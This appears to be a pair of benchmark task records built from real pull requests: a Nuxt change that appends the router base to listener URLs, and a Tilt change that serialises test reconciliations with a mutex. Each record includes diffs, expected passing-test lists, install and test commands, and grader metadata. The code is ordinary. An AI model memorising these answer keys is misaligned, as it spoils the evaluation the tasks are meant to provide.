diff --git a/packages/config/test/options.test.js b/packages/config/test/options.test.js index e744db32e..87b458d81 100644 --- a/packages/config/test/options.test.js +++ b/packages/config/test/options.test.js @@ -227,3 +227,10 @@ describe('config: options', () => { }) }) }) + +describe('config: router', () => { + test('should sanitize router.base', () => { + const config = getNuxtConfig({ router: { base: '/foo' } }) + expect(config.router.base).toBe('/foo/') + }) +}) diff --git a/packages/server/test/listener.test.js b/packages/server/test/listener.test.js index e53624fd6..f37842157 100644 --- a/packages/server/test/listener.test.js +++ b/packages/server/test/listener.test.js @@ -228,7 +228,8 @@ describe('server: listener', () => { test('should compute http url', () => { const options = { port: 3000, - host: 'localhost' + host: 'localhost', + baseURL: '/' } const listener = new Listener(options) listener.server = mockServer() @@ -240,7 +241,7 @@ describe('server: listener', () => { listener.computeURL() expect(listener.host).toEqual('localhost') expect(listener.port).toEqual(3000) - expect(listener.url).toEqual('http://localhost:3000') + expect(listener.url).toEqual('http://localhost:3000/') listener.server.address.mockReturnValueOnce({ address: '127.0.0.1', @@ -249,7 +250,7 @@ describe('server: listener', () => { listener.computeURL() expect(listener.host).toEqual('localhost') expect(listener.port).toEqual(3001) - expect(listener.url).toEqual('http://localhost:3001') + expect(listener.url).toEqual('http://localhost:3001/') ip.address.mockReturnValueOnce('192.168.0.1') listener.server.address.mockReturnValueOnce({ @@ -259,14 +260,15 @@ describe('server: listener', () => { listener.computeURL() expect(listener.host).toEqual('192.168.0.1') expect(listener.port).toEqual(3002) - expect(listener.url).toEqual('http://192.168.0.1:3002') + expect(listener.url).toEqual('http://192.168.0.1:3002/') }) test('should compute https url', () => { const options = { port: 3000, 
host: 'localhost', - https: true + https: true, + baseURL: '/' } const listener = new Listener(options) listener.server = mockServer() @@ -278,7 +280,7 @@ describe('server: listener', () => { listener.computeURL() expect(listener.host).toEqual('localhost') expect(listener.port).toEqual(3000) - expect(listener.url).toEqual('https://localhost:3000') + expect(listener.url).toEqual('https://localhost:3000/') listener.server.address.mockReturnValueOnce({ address: '127.0.0.1', @@ -287,7 +289,7 @@ describe('server: listener', () => { listener.computeURL() expect(listener.host).toEqual('localhost') expect(listener.port).toEqual(3001) - expect(listener.url).toEqual('https://localhost:3001') + expect(listener.url).toEqual('https://localhost:3001/') ip.address.mockReturnValueOnce('192.168.0.1') listener.server.address.mockReturnValueOnce({ @@ -297,7 +299,7 @@ describe('server: listener', () => { listener.computeURL() expect(listener.host).toEqual('192.168.0.1') expect(listener.port).toEqual(3002) - expect(listener.url).toEqual('https://192.168.0.1:3002') + expect(listener.url).toEqual('https://192.168.0.1:3002/') }) test('should compute unix socket url', () => { diff --git a/packages/server/test/server.test.js b/packages/server/test/server.test.js index 55e46e457..ae0727c4b 100644 --- a/packages/server/test/server.test.js +++ b/packages/server/test/server.test.js @@ -43,6 +43,9 @@ describe('server: server', () => { build: { publicPath: '__nuxt_test' }, + router: { + base: '/foo/' + }, render: { id: 'test-render', dist: { @@ -485,7 +488,8 @@ describe('server: server', () => { socket: '/var/nuxt/unix.socket', https: undefined, app: server.app, - dev: server.options.dev + dev: server.options.dev, + baseURL: '/foo/' }) expect(listener.listen).toBeCalledTimes(1) expect(server.listeners).toEqual([ listener ]) @@ -508,7 +512,8 @@ describe('server: server', () => { expect(Listener).toBeCalledWith({ ...nuxt.options.server, app: server.app, - dev: server.options.dev + dev: 
server.options.dev, + baseURL: '/foo/' }) })
[ "should compute http url", "should compute https url" ]
[ "should return server configurations with NUXT_* env", "should return server configurations with env", "should return server configurations with npm_* env", "should export getDefaultNuxtConfig and getNuxtConfig", "should construct context", "should get context with req and res", "should get correct globals", "should export Module, Nuxt and Resolver", "should export Server and Listener", "should export Builder", "should call fn in sequence", "should call fn in parallel", "chainFn (mutate, mutate)", "chainFn (mutate, return)", "chainFn (return, mutate)", "chainFn (return, return)", "chainFn (return, non-function)", "chainFn (non-function, return)", "should export Generator", "should return dev filenames", "should return prod filenames", "should return modern filenames", "should return error middleware", "should send html error response", "should send json error response", "should send html error response by youch in debug mode", "should send json error response by youch in debug mode", "should search all possible paths when read source", "should return source content after read source", "should return relative fileName if fileName is absolute path", "should ignore error when reading source", "should return if fileName is unknown when read source", "should check if given argument is string", "should check if given argument is empty string", "should check if given argument is pure object", "should check if given argument is url", "should wrap given argument with array", "should strip white spaces in given argument", "should encode html", "should join url", "should return builder plugins context", "should return builder build options", "detectTypeScript detects and registers runtime", "detectTypeScript skips rootDir without tsconfig.json", "should export all methods from utils folder", "should return globals with given globalName", "should check if path starts with alias", "should check if path starts with root alias", "should check if path starts with src alias", 
"should return same path in linux", "should define alias", "should check if given argument is index file or folder", "should return main module", "should resolve alias path", "should keep webpack inline loaders prepended", "should check path which is not started with alias", "should list all commands", "onCompromised lock warns on compromise by default", "can override default options", "createLockPath creates the same lockPath for identical locks", "createLockPath creates unique lockPaths for different ids", "createLockPath creates unique lockPaths for different dirs", "createLockPath creates unique lockPaths for different roots", "getLockPath creates lockPath when it doesnt exists", "lock creates a lock and returns a release fn", "lock throws error when lock already exists", "lock logs warning when it couldnt get a lock", "lock logs warning when proper.lock threw error", "lock returns a release method for unlocking both lockfile as lockPath", "lock release also cleansup onExit set", "lock release only logs error when error thrown", "lock check only logs error when error thrown", "lock release doesnt log error when error thrown because lock compromised", "lock sets exit listener once to remove lockPaths", "exit listener removes all lockPaths when called", "lock uses setLockOptions to set defaults", "should flat route with path", "should ignore route with * and :", "should resolve route with /", "should guard parent dir", "should guard same dir", "should not guard same level dir", "should not guard same level dir - 2", "should not guard child dir", "should promisify array routes", "should promisify functional routes", "should promisify promisable functional routes", "should promisify promisable functional routes with arguments", "should promisify functional routes with error", "should promisify functional routes with arguments and error", "should promisify functional routes with result", "should promisify functional routes with arguments and result", "createRoutes 
should allow snake case routes in posix system", "should return default nuxt configurations", "should return nuxt configurations with custom env", "timeout (promise)", "timeout (async function)", "timeout (timeout in 100ms)", "timeout (async timeout in 100ms)", "waitFor", "should construct Timer", "should create new time record", "should stop and remove time record", "should be quiet if end with nonexistent time", "should use bigint hrtime if supports", "should calculate duration with bigint hrtime", "should use hrtime if bigint it not supported", "should calculate duration with hrtime", "should clear all times", "should construct Ignore", "should add ignore file", "should find ignore file", "should only find existed ignore file", "should filter ignore files", "should return origin paths if there is no ignorefile", "should reload ignore", "should return false in default shouldPrefetch", "should return true in script/style shouldPreload", "should return false in other shouldPreload", "should import relative module", "should import core module", "should print error when module not found", "should throw error when error is not module not found", "should return modern middleware", "should not detect modern build if modern mode is specified", "should detect client modern build and display message", "should detect server modern build and display message", "should not detect modern browser if modern build is not found", "should not detect modern browser if connect has been detected", "should detect modern browser based on user-agent", "should detect legacy browser based on user-agent", "should ignore illegal user-agent", "should serialize normal function", "should serialize shorthand function", "should serialize arrow function", "should not replace custom scripts", "should serialize internal function", "should construct listener", "should listen http host and port", "should listen https host and port", "should listen unix socket host and port", "should prevent listening 
multiple times", "should throw error if error occurred or listen failed", "should compute unix socket url", "should throw error in serverErrorHandler", "should throw address in use error", "should throw address in use error for socket", "should fallback to a random port in address in use error", "should close server", "should prevent destroying server if server is not listening" ]
Method: Listener.constructor({port: number, host: string, socket?: string, https?: boolean, app: any, dev: boolean, baseURL?: string}) Location: packages/server/src/listener.js Inputs: - **port** – HTTP port number the server will listen on. - **host** – Hostname or IP address; `'0.0.0.0'` is resolved to the local IP. - **socket** – Optional Unix socket path. - **https** – When true the listener will use the `https` scheme. - **app** – The underlying HTTP/HTTPS application instance (e.g., Express). - **dev** – Flag indicating development mode. - **baseURL** – Optional router base (e.g., `'/foo/'`). If provided it is appended to the computed listener URL; it should end with a trailing `/`. Outputs: - Returns a new `Listener` instance with the supplied options stored as instance properties (`port`, `host`, `socket`, `https`, `app`, `dev`, `baseURL`). After the server starts, `computeURL()` will produce a URL that includes the `baseURL` suffix (e.g., `http://localhost:3000/`). Description: Constructs a server listener object, now extended to accept a `baseURL` parameter so that the generated listener URL correctly reflects the Nuxt router base. Use this when configuring a Nuxt server with a custom router base to ensure URLs (including those shown in CLI banners) are properly formed.
MIT
{ "base_image_name": "node_16", "install": [ "sed -i '/\"packageManager\":/d' package.json", "npm install --prefer-offline --no-audit --progress=false --ignore-scripts --legacy-peer-deps", "npx lerna link", "npx jiti ./scripts/pkg.js" ], "log_parser": "parse_log_js_4", "test_cmd": "npx jest --forceExit --verbose --silent --passWithNoTests packages/" }
{ "num_modified_files": 3, "num_modified_lines": 16, "pr_author": "pi0", "pr_labels": [], "llm_metadata": { "code": "A", "code_quality": null, "confidence": 0.98, "detected_issues": { "B1": false, "B2": false, "B3": false, "B4": false, "B5": false, "B6": false }, "detected_issues_explanation": null, "detecte d_issues": null, "difficulty": "medium", "external_urls": [], "intent_completeness": "complete", "patch": null, "pr_categories": [ "minor_bug" ], "reason": null, "reasoning": "The issue requests sanitizing `router.base` to always end with a slash and appending this base to URLs computed by the server listener. The added tests directly verify that the config normalizes the base and that Listener URLs include the trailing slash, matching the stated requirements. No test assertions rely on undocumented names, external resources, or unrelated code, and the specification is clear and complete. Therefore the task is well‑defined and aligns with the tests, qualifying as a solvable (A) task.", "suggested_fixes": null, "test_alignment": null, "test_alignment_issues": [], "test_alignment_quick_tree": null, "test_alignment_quick_tree_bootstrap": null, "test_alignment_quick_tree_mocks": null, "test_alignment_quick_tree_params": null, "test_alignment_quick_tree_unrelated": null, "test_alignment_quick_tree_use_hook": null, "test_alignment_quick_tree_use_hook_unrelated": null, "test_alignment_sample_without_replacement": null, "test_alignment_test_alignment_sample_without_replacement": null, "test_build_phylogeny": null, "test_build_phylogeny_unrelated": null, "test_build_phylogeny_use_hook": null, "test_build_phylogeny_use_hook_unrelated": null, "test_core_seq_test_sample_motif_length_1": null, "test_core_seq_test_sample_motif_length_3": null, "test_core_seq_test_sample_without_replacement": null, "test_core_sequence": null, "test_core_sequence_test_sample_motif_length_1": null, "test_core_sequence_test_sample_motif_length_3": null, 
"test_core_sequence_test_sample_without_replacement": null, "test_sample_motif_length_1": null, "test_sample_motif_length_3": null, "test_sample_without_replacement": null } }
8cddf4d852ce2bd027d3d577796be179a3f24380
2023-10-10 16:27:45
tilt-dev__tilt-6246
diff --git a/internal/controllers/fake/fixture.go b/internal/controllers/fake/fixture.go index 60498d4ea..7e84026e4 100644 --- a/internal/controllers/fake/fixture.go +++ b/internal/controllers/fake/fixture.go @@ -5,6 +5,7 @@ import ( "io" "os" "strings" + "sync" "testing" "github.com/stretchr/testify/assert" @@ -17,8 +18,10 @@ import ( "sigs.k8s.io/controller-runtime/pkg/cache" ctrlclient "sigs.k8s.io/controller-runtime/pkg/client" "sigs.k8s.io/controller-runtime/pkg/reconcile" + "sigs.k8s.io/controller-runtime/pkg/source" "github.com/tilt-dev/tilt-apiserver/pkg/server/builder/resource" + "github.com/tilt-dev/tilt/internal/controllers/indexer" "github.com/tilt-dev/tilt/internal/store" "github.com/tilt-dev/tilt/internal/testutils" "github.com/tilt-dev/tilt/internal/testutils/bufsync" @@ -44,20 +47,22 @@ type ControllerFixture struct { out *bufsync.ThreadSafeBuffer ctx context.Context cancel context.CancelFunc - controller controller + controller reconcile.Reconciler Store *testStore Scheme *runtime.Scheme Client ctrlclient.Client } type ControllerFixtureBuilder struct { - t testing.TB - ctx context.Context - cancel context.CancelFunc - out *bufsync.ThreadSafeBuffer - ma *analytics.MemoryAnalytics - Client ctrlclient.Client - Store *testStore + t testing.TB + ctx context.Context + cancel context.CancelFunc + out *bufsync.ThreadSafeBuffer + ma *analytics.MemoryAnalytics + Client ctrlclient.Client + Store *testStore + requeuer source.Source + requeuerResultChan chan indexer.RequeueForTestResult } func NewControllerFixtureBuilder(t testing.TB) *ControllerFixtureBuilder { @@ -80,15 +85,25 @@ func NewControllerFixtureBuilder(t testing.TB) *ControllerFixtureBuilder { } } -func (b ControllerFixtureBuilder) Scheme() *runtime.Scheme { +func (b *ControllerFixtureBuilder) WithRequeuer(r source.Source) *ControllerFixtureBuilder { + b.requeuer = r + return b +} + +func (b *ControllerFixtureBuilder) WithRequeuerResultChan(ch chan indexer.RequeueForTestResult) 
*ControllerFixtureBuilder { + b.requeuerResultChan = ch + return b +} + +func (b *ControllerFixtureBuilder) Scheme() *runtime.Scheme { return b.Client.Scheme() } -func (b ControllerFixtureBuilder) Analytics() *analytics.MemoryAnalytics { +func (b *ControllerFixtureBuilder) Analytics() *analytics.MemoryAnalytics { return b.ma } -func (b ControllerFixtureBuilder) Build(c controller) *ControllerFixture { +func (b *ControllerFixtureBuilder) Build(c controller) *ControllerFixture { b.t.Helper() // apiserver controller initialization is awkward and some parts are done via the builder, @@ -99,6 +114,16 @@ func (b ControllerFixtureBuilder) Build(c controller) *ControllerFixture { _, err := c.CreateBuilder(&FakeManager{}) require.NoError(b.t, err, "Error in controller CreateBuilder()") + // In a normal controller, there's a central reconciliation loop + // that ensures we never have two reconcile() calls running simultaneously. + // + // In our test code, we want to people to invoke Reconcile() directly and in + // the background. So instead, we wrap the Reconcile() call in mutex. 
+ lc := NewLockedController(c) + if b.requeuer != nil { + indexer.StartSourceForTesting(b.Context(), b.requeuer, lc, b.requeuerResultChan) + } + return &ControllerFixture{ t: b.t, out: b.out, @@ -107,23 +132,23 @@ func (b ControllerFixtureBuilder) Build(c controller) *ControllerFixture { Scheme: b.Client.Scheme(), Client: b.Client, Store: b.Store, - controller: c, + controller: lc, } } -func (b ControllerFixtureBuilder) OutWriter() io.Writer { +func (b *ControllerFixtureBuilder) OutWriter() io.Writer { return b.out } -func (b ControllerFixtureBuilder) Context() context.Context { +func (b *ControllerFixtureBuilder) Context() context.Context { return b.ctx } -func (b ControllerFixture) Stdout() string { +func (b *ControllerFixture) Stdout() string { return b.out.String() } -func (f ControllerFixture) T() testing.TB { +func (f *ControllerFixture) T() testing.TB { return f.t } @@ -132,7 +157,7 @@ func (f ControllerFixture) T() testing.TB { // Normally, it's not necessary to call this - the fixture will automatically cancel the context as part of test // cleanup to avoid leaking resources. However, if you want to explicitly test how a controller reacts to context // cancellation, this method can be used. 
-func (f ControllerFixture) Cancel() { +func (f *ControllerFixture) Cancel() { f.cancel() } @@ -269,3 +294,24 @@ type FakeManager struct { func (m *FakeManager) GetCache() cache.Cache { return nil } + +type LockedController struct { + mu sync.Mutex + controller controller +} + +func NewLockedController(c controller) *LockedController { + return &LockedController{controller: c} +} + +func (c *LockedController) Reconcile(ctx context.Context, req reconcile.Request) (ctrl.Result, error) { + c.mu.Lock() + defer c.mu.Unlock() + return c.controller.Reconcile(ctx, req) +} + +func (c *LockedController) CreateBuilder(mgr ctrl.Manager) (*builder.Builder, error) { + return c.controller.CreateBuilder(mgr) +} + +var _ controller = &LockedController{} diff --git a/pkg/webview/view.pb.go b/pkg/webview/view.pb.go index f5a6ff609..5761f919e 100644 --- a/pkg/webview/view.pb.go +++ b/pkg/webview/view.pb.go @@ -741,12 +741,12 @@ func (x *VersionSettings) GetCheckUpdates() bool { // Our websocket service has two kinds of View messages: // -// 1) On initialization, we send down the complete view state -// (TiltStartTime, UISession, UIResources, and LogList) +// 1. On initialization, we send down the complete view state +// (TiltStartTime, UISession, UIResources, and LogList) // -// 2) On every change, we send down the resources that have -// changed since the last send(). -// (new logs and any updated UISession/UIResource objects). +// 2. On every change, we send down the resources that have +// changed since the last send(). +// (new logs and any updated UISession/UIResource objects). // // All other fields are obsolete, but are needed for deserializing // old snapshots. @@ -1268,9 +1268,9 @@ func (x *UploadSnapshotResponse) GetUrl() string { // NOTE(nick): This is obsolete. // // Our websocket service has two kinds of messages: -// 1) On initialization, we send down the complete view state -// 2) On every change, we send down the resources that have -// changed since the last send(). 
+// 1. On initialization, we send down the complete view state +// 2. On every change, we send down the resources that have +// changed since the last send(). type AckWebsocketRequest struct { state protoimpl.MessageState sizeCache protoimpl.SizeCache
test: use a mutex to prevent simultaneous reconcilation i think this will fix a bunch of weird race conditions and test flakiness
**Title** Prevent concurrent reconciliations in controller test fixtures **Problem** Tests that invoke controller reconciliations directly can run multiple reconcile loops at the same time, leading to race conditions and intermittent failures. This divergence from the production execution model makes test outcomes unreliable. **Root Cause** The test harness does not enforce the single‑threaded guarantee that the controller manager provides in production, allowing overlapping reconcile calls. **Fix / Expected Behavior** - Introduce a wrapper around controllers that serialises reconcile execution with a mutual‑exclusion lock. - Integrate this wrapper into the test fixture builder so all test‑instantiated controllers automatically use the serialized behavior. - Extend the builder to optionally accept a source for requeue testing and a channel for receiving requeue results. - Preserve the original controller interfaces and functionality while adding the safety layer. **Risk & Validation** - Verify that no deadlock occurs when the requeue source interacts with the locked controller. - Run the full test suite to confirm that previously flaky tests now pass consistently. - Ensure that production controller behavior remains unchanged by confirming no regressions in integration tests.
6,246
tilt-dev/tilt
diff --git a/internal/controllers/core/cluster/reconciler_test.go b/internal/controllers/core/cluster/reconciler_test.go index c29710da6..a4d30b283 100644 --- a/internal/controllers/core/cluster/reconciler_test.go +++ b/internal/controllers/core/cluster/reconciler_test.go @@ -291,9 +291,8 @@ func newFixture(t *testing.T) *fixture { base, "tilt-default") requeueChan := make(chan indexer.RequeueForTestResult, 1) - indexer.StartSourceForTesting(cfb.Context(), r.requeuer, r, requeueChan) return &fixture{ - ControllerFixture: cfb.Build(r), + ControllerFixture: cfb.WithRequeuer(r.requeuer).WithRequeuerResultChan(requeueChan).Build(r), r: r, ma: cfb.Analytics(), clock: clock, diff --git a/internal/controllers/core/cmd/controller_test.go b/internal/controllers/core/cmd/controller_test.go index 1aeafa35b..c04ec6c31 100644 --- a/internal/controllers/core/cmd/controller_test.go +++ b/internal/controllers/core/cmd/controller_test.go @@ -20,7 +20,6 @@ import ( "sigs.k8s.io/controller-runtime/pkg/reconcile" "github.com/tilt-dev/tilt/internal/controllers/fake" - "github.com/tilt-dev/tilt/internal/controllers/indexer" "github.com/tilt-dev/tilt/internal/engine/local" "github.com/tilt-dev/tilt/internal/store" "github.com/tilt-dev/tilt/internal/testutils/configmap" @@ -946,10 +945,9 @@ func newFixture(t *testing.T) *fixture { sc := local.NewServerController(f.Client) clock := clockwork.NewFakeClock() c := NewController(f.Context(), fe, fpm, f.Client, st, clock, v1alpha1.NewScheme()) - indexer.StartSourceForTesting(f.Context(), c.requeuer, c, nil) return &fixture{ - ControllerFixture: f.Build(c), + ControllerFixture: f.WithRequeuer(c.requeuer).Build(c), st: st, fe: fe, fpm: fpm, diff --git a/internal/controllers/core/dockercomposelogstream/reconciler_test.go b/internal/controllers/core/dockercomposelogstream/reconciler_test.go index cbc2126d0..401a16bc5 100644 --- a/internal/controllers/core/dockercomposelogstream/reconciler_test.go +++ 
b/internal/controllers/core/dockercomposelogstream/reconciler_test.go @@ -11,7 +11,6 @@ import ( "github.com/tilt-dev/tilt/internal/container" "github.com/tilt-dev/tilt/internal/controllers/fake" - "github.com/tilt-dev/tilt/internal/controllers/indexer" "github.com/tilt-dev/tilt/internal/docker" "github.com/tilt-dev/tilt/internal/dockercompose" "github.com/tilt-dev/tilt/pkg/apis/core/v1alpha1" @@ -173,10 +172,9 @@ func newFixture(t *testing.T) *fixture { dcCli := dockercompose.NewFakeDockerComposeClient(t, cfb.Context()) dCli := docker.NewFakeClient() r := NewReconciler(cfb.Client, cfb.Store, dcCli, dCli) - indexer.StartSourceForTesting(cfb.Context(), r.requeuer, r, nil) return &fixture{ - ControllerFixture: cfb.Build(r), + ControllerFixture: cfb.WithRequeuer(r.requeuer).Build(r), r: r, dc: dCli, dcc: dcCli, diff --git a/internal/controllers/core/filewatch/controller_test.go b/internal/controllers/core/filewatch/controller_test.go index 946f2b7ff..ba392f531 100644 --- a/internal/controllers/core/filewatch/controller_test.go +++ b/internal/controllers/core/filewatch/controller_test.go @@ -19,7 +19,6 @@ import ( "github.com/tilt-dev/tilt/internal/controllers/core/filewatch/fsevent" "github.com/tilt-dev/tilt/internal/controllers/fake" - "github.com/tilt-dev/tilt/internal/controllers/indexer" "github.com/tilt-dev/tilt/internal/store" "github.com/tilt-dev/tilt/internal/testutils/configmap" "github.com/tilt-dev/tilt/internal/testutils/tempdir" @@ -75,10 +74,8 @@ func newFixture(t *testing.T) *fixture { clock := clockwork.NewFakeClock() controller := NewController(cfb.Client, testingStore, fakeMultiWatcher.NewSub, timerMaker.Maker(), filewatches.NewScheme(), clock) - indexer.StartSourceForTesting(cfb.Context(), controller.requeuer, controller, nil) - return &fixture{ - ControllerFixture: cfb.Build(controller), + ControllerFixture: cfb.WithRequeuer(controller.requeuer).Build(controller), t: t, tmpdir: tmpdir, controller: controller, diff --git 
a/internal/controllers/core/kubernetesdiscovery/reconciler_test.go b/internal/controllers/core/kubernetesdiscovery/reconciler_test.go index 4baa012c7..a79cc5ed3 100644 --- a/internal/controllers/core/kubernetesdiscovery/reconciler_test.go +++ b/internal/controllers/core/kubernetesdiscovery/reconciler_test.go @@ -23,7 +23,6 @@ import ( "github.com/tilt-dev/tilt/internal/container" "github.com/tilt-dev/tilt/internal/controllers/apis/cluster" "github.com/tilt-dev/tilt/internal/controllers/fake" - "github.com/tilt-dev/tilt/internal/controllers/indexer" "github.com/tilt-dev/tilt/internal/k8s" "github.com/tilt-dev/tilt/internal/timecmp" "github.com/tilt-dev/tilt/pkg/apis" @@ -722,10 +721,9 @@ func newFixture(t *testing.T) *fixture { cfb := fake.NewControllerFixtureBuilder(t) clients := cluster.NewFakeClientProvider(t, cfb.Client) pw := NewReconciler(cfb.Client, cfb.Scheme(), clients, rd, cfb.Store) - indexer.StartSourceForTesting(cfb.Context(), pw.requeuer, pw, nil) ret := &fixture{ - ControllerFixture: cfb.Build(pw), + ControllerFixture: cfb.WithRequeuer(pw.requeuer).Build(pw), r: pw, ctx: cfb.Context(), t: t, diff --git a/internal/controllers/core/podlogstream/podlogstreamcontroller_test.go b/internal/controllers/core/podlogstream/podlogstreamcontroller_test.go index e7232ca5a..b6f52988d 100644 --- a/internal/controllers/core/podlogstream/podlogstreamcontroller_test.go +++ b/internal/controllers/core/podlogstream/podlogstreamcontroller_test.go @@ -558,11 +558,10 @@ func newPLMFixture(t testing.TB) *plmFixture { st := newPLMStore(t, out) podSource := NewPodSource(ctx, kClient, cfb.Client.Scheme(), clock) plsc := NewController(ctx, cfb.Client, cfb.Scheme(), st, kClient, podSource, clock) - indexer.StartSourceForTesting(cfb.Context(), plsc.podSource, plsc, nil) return &plmFixture{ t: t, - ControllerFixture: cfb.Build(plsc), + ControllerFixture: cfb.WithRequeuer(plsc.podSource).Build(plsc), kClient: kClient, plsc: plsc, ctx: ctx, diff --git 
a/internal/controllers/core/portforward/reconciler_test.go b/internal/controllers/core/portforward/reconciler_test.go index 079253f65..bf4801524 100644 --- a/internal/controllers/core/portforward/reconciler_test.go +++ b/internal/controllers/core/portforward/reconciler_test.go @@ -18,7 +18,6 @@ import ( "github.com/tilt-dev/tilt/internal/controllers/apis/cluster" "github.com/tilt-dev/tilt/internal/controllers/fake" - "github.com/tilt-dev/tilt/internal/controllers/indexer" "github.com/tilt-dev/tilt/pkg/apis" "github.com/tilt-dev/tilt/pkg/model" @@ -353,10 +352,9 @@ func newPFRFixture(t *testing.T) *pfrFixture { cfb := fake.NewControllerFixtureBuilder(t) clients := cluster.NewFakeClientProvider(t, cfb.Client) r := NewReconciler(cfb.Client, cfb.Scheme(), cfb.Store, clients) - indexer.StartSourceForTesting(cfb.Context(), r.requeuer, r, nil) return &pfrFixture{ - ControllerFixture: cfb.Build(r), + ControllerFixture: cfb.WithRequeuer(r.requeuer).Build(r), t: t, st: cfb.Store, r: r, diff --git a/internal/controllers/indexer/list_test.go b/internal/controllers/indexer/list_test.go index b5a05ee37..a548252f0 100644 --- a/internal/controllers/indexer/list_test.go +++ b/internal/controllers/indexer/list_test.go @@ -1,4 +1,4 @@ -package indexer +package indexer_test import ( "context" @@ -11,6 +11,7 @@ import ( "sigs.k8s.io/controller-runtime/pkg/controller/controllerutil" "github.com/tilt-dev/tilt/internal/controllers/fake" + "github.com/tilt-dev/tilt/internal/controllers/indexer" "github.com/tilt-dev/tilt/pkg/apis/core/v1alpha1" "github.com/tilt-dev/tilt/pkg/logger" ) @@ -57,10 +58,10 @@ func TestListOwnedBy(t *testing.T) { assert.NoError(t, c.Create(ctx, pls2a)) var plsList1 v1alpha1.PodLogStreamList - assert.NoError(t, ListOwnedBy(ctx, c, &plsList1, types.NamespacedName{Name: kd1.Name}, kd1.TypeMeta)) + assert.NoError(t, indexer.ListOwnedBy(ctx, c, &plsList1, types.NamespacedName{Name: kd1.Name}, kd1.TypeMeta)) assert.ElementsMatch(t, []v1alpha1.PodLogStream{*pls1a, 
*pls1b}, plsList1.Items) var plsList2 v1alpha1.PodLogStreamList - assert.NoError(t, ListOwnedBy(ctx, c, &plsList2, types.NamespacedName{Name: kd2.Name}, kd2.TypeMeta)) + assert.NoError(t, indexer.ListOwnedBy(ctx, c, &plsList2, types.NamespacedName{Name: kd2.Name}, kd2.TypeMeta)) assert.ElementsMatch(t, []v1alpha1.PodLogStream{*pls2a}, plsList2.Items) }
[ "TestController_LimitFileEventsHistory", "TestController_ShortRead", "TestController_IgnoreEphemeralFiles", "TestController_Watcher_Cancel", "TestController_Reconcile_Create", "TestController_Reconcile_Delete", "TestController_Reconcile_Watches", "TestController_Disable_By_Configmap", "TestController_Disable_Ignores_File_Changes", "TestCreateSubError", "TestStartSubError" ]
[]
Method: ControllerFixtureBuilder.WithRequeuer(r source.Source) *ControllerFixtureBuilder Location: internal/controllers/fake/fixture.go Inputs: r – a source.Source implementation (typically a controller’s requeuer) that will be stored for later wiring into the test fixture. Outputs: Returns the same *ControllerFixtureBuilder (allowing chaining) with its internal `requeuer` field set. Description: Registers a requeuer with the fixture builder so that, when Build is called, the test controller can be wrapped with a mutex and the requeuer can be started for testing. Method: ControllerFixtureBuilder.WithRequeuerResultChan(ch chan indexer.RequeueForTestResult) *ControllerFixtureBuilder Location: internal/controllers/fake/fixture.go Inputs: ch – a buffered channel that will receive `indexer.RequeueForTestResult` values emitted by the test‑mode requeuer. Outputs: Returns the same *ControllerFixtureBuilder (allowing chaining) with its internal `requeuerResultChan` field set. Description: Supplies a channel for the test harness to observe requeue events generated by the controller’s requeuer during the test run. Function: NewLockedController(c controller) *LockedController Location: internal/controllers/fake/fixture.go Inputs: c – an implementation of the internal `controller` interface (i.e., a Tilt controller). Outputs: A *LockedController that embeds the original controller and a sync.Mutex. Description: Creates a wrapper that serialises calls to the underlying controller’s Reconcile method, preventing concurrent reconciliations in test environments. Method: LockedController.Reconcile(ctx context.Context, req reconcile.Request) (ctrl.Result, error) Location: internal/controllers/fake/fixture.go Inputs: ctx – the reconciliation context; req – the reconcile.Request identifying the object to reconcile. Outputs: (ctrl.Result, error) returned by the wrapped controller’s Reconcile after the mutex is released. 
Description: Locks the controller’s mutex, forwards the call to the underlying controller’s Reconcile, then unlocks, ensuring only one reconciliation runs at a time. Method: LockedController.CreateBuilder(mgr ctrl.Manager) (*builder.Builder, error) Location: internal/controllers/fake/fixture.go Inputs: mgr – a controller-runtime manager supplied during fixture construction. Outputs: The builder and error returned by the wrapped controller’s CreateBuilder. Description: Forwards builder creation to the underlying controller; required to satisfy the `controller` interface when the wrapped controller is used in tests.
Apache-2.0
{ "base_image_name": "go_1.23.8", "install": [ "export DEBIAN_FRONTEND=noninteractive", "apt-get update -qq", "apt-get install -y -qq wget", "wget https://go.dev/dl/go1.23.0.linux-amd64.tar.gz", "tar -C /usr/local -xzf go1.23.0.linux-amd64.tar.gz", "export PATH=$PATH:/usr/local/go/bin", "export HOME=/root", "export GOPATH=$HOME/go", "export GOCACHE=$HOME/.cache/go-build", "mkdir -p $GOPATH", "mkdir -p $GOCACHE", "go install gotest.tools/gotestsum@latest" ], "log_parser": "parse_log_gotest", "test_cmd": "go test -mod vendor -v ./internal/controllers/core/filewatch/..." }
{ "num_modified_files": 2, "num_modified_lines": 71, "pr_author": "nicks", "pr_labels": [], "llm_metadata": { "code": "A", "code_quality": null, "confidence": 0.88, "detected_issues": { "B1": false, "B2": false, "B3": false, "B4": false, "B5": false, "B6": false }, "detected_issues_explanation": null, "detecte d_issues": null, "difficulty": "medium", "external_urls": [], "intent_completeness": "complete", "patch": null, "pr_categories": [ "minor_bug" ], "reason": null, "reasoning": "The issue requests adding a mutex to avoid concurrent reconciliations, aiming to eliminate race conditions in tests. The provided patch introduces a LockedController with a mutex, extends the fixture builder with WithRequeuer helpers, and updates all affected tests to use the new fixture, aligning the test expectations with the fix. There are no signals of test suite coupling, implicit naming, external dependencies, ambiguous specs, unrelated patch artifacts, or hidden domain knowledge. Hence the task is clearly specified and solvable.", "suggested_fixes": null, "test_alignment": null, "test_alignment_issues": [], "test_alignment_quick_tree": null, "test_alignment_quick_tree_bootstrap": null, "test_alignment_quick_tree_mocks": null, "test_alignment_quick_tree_params": null, "test_alignment_quick_tree_unrelated": null, "test_alignment_quick_tree_use_hook": null, "test_alignment_quick_tree_use_hook_unrelated": null, "test_alignment_sample_without_replacement": null, "test_alignment_test_alignment_sample_without_replacement": null, "test_build_phylogeny": null, "test_build_phylogeny_unrelated": null, "test_build_phylogeny_use_hook": null, "test_build_phylogeny_use_hook_unrelated": null, "test_core_seq_test_sample_motif_length_1": null, "test_core_seq_test_sample_motif_length_3": null, "test_core_seq_test_sample_without_replacement": null, "test_core_sequence": null, "test_core_sequence_test_sample_motif_length_1": null, "test_core_sequence_test_sample_motif_length_3": null, 
"test_core_sequence_test_sample_without_replacement": null, "test_sample_motif_length_1": null, "test_sample_motif_length_3": null, "test_sample_without_replacement": null } }
59f9aa24c86dc5302772c61905275fd90675596f
2025-01-16 03:29:33
nicks: hmm..something weird is happening on mac that i have to look into...sadly, circleci turned off our mac runners and i haven't figured out how to fix them.
tilt-dev__tilt-6488
